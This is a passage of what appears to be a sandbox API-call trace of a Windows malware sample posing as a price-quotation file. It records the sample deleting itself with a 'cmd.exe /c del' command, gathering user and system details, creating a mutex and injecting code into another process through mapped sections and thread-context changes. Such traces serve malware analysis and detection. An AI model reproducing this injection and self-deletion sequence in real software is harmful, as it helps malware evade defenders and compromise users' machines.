DosPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe", NtPathName=0xdf064, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.324] NtCreateFile (in: FileHandle=0xdf084, DesiredAccess=0x120089, ObjectAttributes=0xdf04c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf06c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf084*=0x160, IoStatusBlock=0xdf06c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0121.324] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x677490) returned 1 [0121.328] NtQueryInformationFile (in: FileHandle=0x160, IoStatusBlock=0xdf06c, FileInformation=0xdefc4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf06c, FileInformation=0xdefc4) returned 0x0 [0121.328] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x41765) returned 0x685c90 [0121.336] NtReadFile (in: FileHandle=0x160, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0xdf06c, Buffer=0x685c90, BufferLength=0x41365, ByteOffset=0xdefdc*=0, Key=0x0 | out: IoStatusBlock=0xdf06c, Buffer=0x685c90*) returned 0x0 [0121.337] NtClose (Handle=0x160) returned 0x0 [0121.337] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe", NtPathName=0xdf054, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.337] NtCreateFile (in: FileHandle=0xdf074, DesiredAccess=0x120089, ObjectAttributes=0xdf03c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf05c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf074*=0x160, IoStatusBlock=0xdf05c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0121.337] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x677490) returned 1 [0121.337] NtQueryInformationFile (in: FileHandle=0x160, IoStatusBlock=0xdf05c, FileInformation=0xdefb4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf05c, FileInformation=0xdefb4) returned 0x0 [0121.337] NtClose (Handle=0x160) returned 0x0 [0121.338] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xde554, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.338] NtCreateFile (in: FileHandle=0xde574, DesiredAccess=0x120089, ObjectAttributes=0xde53c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde55c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde574*=0x160, IoStatusBlock=0xde55c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0121.338] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x67aae0) returned 1 [0121.338] NtQueryInformationFile (in: FileHandle=0x160, IoStatusBlock=0xde55c, FileInformation=0xde2d0, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0xde55c, FileInformation=0xde2d0) returned 0x0 [0121.338] NtClose (Handle=0x160) returned 0x0 [0121.338] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x208) returned 0x6c7400 [0121.338] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6c7400) returned 1 [0121.340] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\cmd.exe", lpCommandLine="/c del \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xdec24*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xdec68, hNewToken=0x0 | out: lpProcessInformation=0xdec68*(hProcess=0x184, hThread=0x160, dwProcessId=0x9a4, dwThreadId=0x188), hNewToken=0x0) returned 1 [0121.910] NtWaitForSingleObject (Object=0x184, Alertable=0, Time=0x0) returned 0x0 [0123.602] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xde940 | out: Value="C:\\Program Files (x86)") returned 0x0 [0123.688] SetErrorMode (uMode=0x8003) returned 0x1 [0123.690] NtCreateSection (in: SectionHandle=0xdeccc, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xdea4c, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xdeccc*=0x18c) returned 0x0 [0123.694] NtMapViewOfSection (in: SectionHandle=0x18c, ProcessHandle=0xffffffff, BaseAddress=0xdecd0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xdea4c*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xdecd0*=0x770000, SectionOffset=0x0, ViewSize=0xdea4c*=0x29000) returned 0x0 [0123.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea44*=0x0, ZeroBits=0x0, RegionSize=0xdea48*=0x28c00, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xdea44*=0x7a0000, RegionSize=0xdea48*=0x29000) returned 0x0 [0123.704] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2000) returned 0x6c7400 [0123.704] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xde788 | out: TokenHandle=0xde788*=0x188) returned 0x0 [0123.708] NtQueryInformationToken (in: TokenHandle=0x188, TokenInformationClass=0x1, TokenInformation=0xddf80, TokenInformationLength=0x400, ReturnLength=0xde780 | out: TokenInformation=0xddf80, ReturnLength=0xde780) returned 0x0 [0123.709] ConvertSidToStringSidW (in: Sid=0xddf88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xde784 | out: StringSid=0xde784*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0123.709] NtClose (Handle=0x188) returned 0x0 [0123.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xde9f8*=0x0, ZeroBits=0x0, RegionSize=0xde9fc*=0x8f636, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xde9f8*=0x7d0000, RegionSize=0xde9fc*=0x90000) returned 0x0 [0123.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xde9e4*=0x0, ZeroBits=0x0, RegionSize=0xde9e8*=0x8f636, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xde9e4*=0xc10000, RegionSize=0xde9e8*=0x90000) returned 0x0 [0123.731] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6c7400) returned 1 [0123.731] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x6c7400 [0123.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0123.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0123.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0123.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0123.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0123.740] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xde110 | out: Value="RDhJ0CNFevzX") returned 0x0 [0123.740] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde47c | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0123.740] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde46c | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0123.740] NtCreateSection (in: SectionHandle=0xdfabc, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde494, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xdfabc*=0x188) returned 0x0 [0123.740] NtMapViewOfSection (in: SectionHandle=0x188, ProcessHandle=0xffffffff, BaseAddress=0xdfab8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde494*=0x1b58000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xdfab8*=0x67b0000, SectionOffset=0x0, ViewSize=0xde494*=0x1b58000) returned 0x0 [0123.741] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x4000) returned 0x6c8408 [0123.741] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xddc2c | out: TokenHandle=0xddc2c*=0x198) returned 0x0 [0123.741] NtQueryInformationToken (in: TokenHandle=0x198, TokenInformationClass=0x1, TokenInformation=0xdd424, TokenInformationLength=0x400, ReturnLength=0xddc24 | out: TokenInformation=0xdd424, ReturnLength=0xddc24) returned 0x0 [0123.741] ConvertSidToStringSidW (in: Sid=0xdd42c*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xddc28 | out: StringSid=0xddc28*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0123.742] NtClose (Handle=0x198) returned 0x0 [0123.760] RtlIntegerToChar (in: Value=0x88c53315, Base=0x10, Length=0x20, String=0x67ba4a9 | out: String="88C53315") returned 0x0 [0123.765] NtCreateKey (in: KeyHandle=0xde6a0, DesiredAccess=0x20219, ObjectAttributes=0xddc2c*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde6a0*=0x198) returned 0x0 [0123.771] NtQueryValueKey (in: KeyHandle=0x198, ValueName="ProductName", KeyValueInformationClass=0x1, KeyValueInformation=0xde278, Length=0x100, ResultLength=0xde6f4 | out: KeyValueInformation=0xde278*(TitleIndex=0x0, Type=0x1, DataOffset=0x30, DataLength=0x1e, NameLength=0x16, Name="ProductName", Data="Windows 10 Pro"), ResultLength=0xde6f4) returned 0x0 [0123.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xddc5c*=0x0, ZeroBits=0x0, RegionSize=0xddc60*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xddc5c*=0xca0000, RegionSize=0xddc60*=0x1f5000) returned 0x0 [0123.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xddc48*=0x0, ZeroBits=0x0, RegionSize=0xddc4c*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xddc48*=0x8310000, RegionSize=0xddc4c*=0x1f5000) returned 0x0 [0123.771] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="TEMP", Value=0xddc4c | out: Value="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x0 [0123.771] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xddc14 | out: Value="C:\\Program Files (x86)") returned 0x0 [0123.857] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x12d5a9, lpParameter=0xdf2e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x19c [0123.858] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x4000) returned 0x6cc410 [0123.858] NtOpenDirectoryObject (in: FileHandle=0xde48c, DesiredAccess=0x2000f, ObjectAttributes=0xde458*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0xde48c*=0x1a0) returned 0x0 [0123.858] NtCreateMutant (in: MutantHandle=0xde710, DesiredAccess=0x1f0001, ObjectAttributes=0xde440*(Length=0x18, RootDirectory=0x1a0, ObjectName="O3-71R46F5CCAG1B", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0xde710*=0x1a4) returned 0x0 [0123.858] NtClose (Handle=0x1a0) returned 0x0 [0123.862] NtOpenProcess (in: ProcessHandle=0xdea74, DesiredAccess=0x438, ObjectAttributes=0xdea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea54*(UniqueProcess=0x664, UniqueThread=0x0) | out: ProcessHandle=0xdea74*=0x1a0) returned 0x0 [0123.862] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea64, ReturnLength=0x0) returned 0x0 [0123.862] NtMapViewOfSection (in: SectionHandle=0x188, ProcessHandle=0x1a0, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xdea5c*=0x1b58000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xdea60*=0x106e0000, SectionOffset=0x0, ViewSize=0xdea5c*=0x1b58000) returned 0x0 [0123.864] NtClose (Handle=0x1a0) returned 0x0 [0123.866] NtDelayExecution (Alertable=0, Interval=0xde6bc*=-50000000) returned 0x0 [0129.044] NtOpenProcess (in: ProcessHandle=0xde678, DesiredAccess=0x438, ObjectAttributes=0xddc28*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xddc68*(UniqueProcess=0x664, UniqueThread=0x0) | out: ProcessHandle=0xde678*=0x1a8) returned 0x0 [0129.049] NtQueryInformationProcess (in: ProcessHandle=0x1a8, ProcessInformationClass=0x0, ProcessInformation=0xddc78, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xddc78, ReturnLength=0x0) returned 0x0 [0129.093] NtOpenThread (in: ThreadHandle=0xddc20, DesiredAccess=0x1a, ObjectAttributes=0xddc28, ClientId=0xddc58*(UniqueProcess=0x0, UniqueThread=0x668) | out: ThreadHandle=0xddc20*=0x1ac) returned 0x0 [0129.102] NtSuspendThread (in: ThreadHandle=0x1ac, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0129.111] NtGetContextThread (in: ThreadHandle=0x1ac, Context=0xde170 | out: Context=0xde170*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x20, [65]=0xa6, [66]=0xe7, [67]=0x4, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x10, [73]=0xe7, [74]=0x5a, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x616920, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x100e8, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x70, [5]=0xf8, [6]=0xc, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0x38, [23]=0x5d, [24]=0xfc, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0x40, [29]=0x41, [30]=0x61, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0xce, [39]=0x5c, [40]=0xfc, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0x34, [45]=0x20, [46]=0x99, [47]=0x5e, [48]=0xfc, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0129.122] NtCreateSection (in: SectionHandle=0xddc00, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xddba0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xddc00*=0x1b0) returned 0x0 [0129.126] NtMapViewOfSection (in: SectionHandle=0x1b0, ProcessHandle=0x1a8, BaseAddress=0xddc08*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddba8*=0x143636, InheritDisposition=0x7ffc00000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddc08*=0xaff0000, SectionOffset=0x0, ViewSize=0xddba8*=0x144000) returned 0x0 [0129.139] NtMapViewOfSection (in: SectionHandle=0x1b0, ProcessHandle=0xffffffffffffffff, BaseAddress=0xddbf8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddba8*=0x144000, InheritDisposition=0x7ffc00000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddbf8*=0xf10000, SectionOffset=0x0, ViewSize=0xddba8*=0x144000) returned 0x0 [0129.202] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0xf10000) returned 0x0 [0129.240] NtClose (Handle=0x1b0) returned 0x0 [0129.245] NtSetContextThread (ThreadHandle=0x1ac, Context=0xde170*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, 